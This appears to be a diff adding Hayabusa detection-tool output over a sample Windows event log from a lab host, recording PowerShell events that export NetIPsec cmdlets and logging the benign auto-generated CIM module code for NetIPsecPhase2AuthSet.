+2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.521 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.523 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 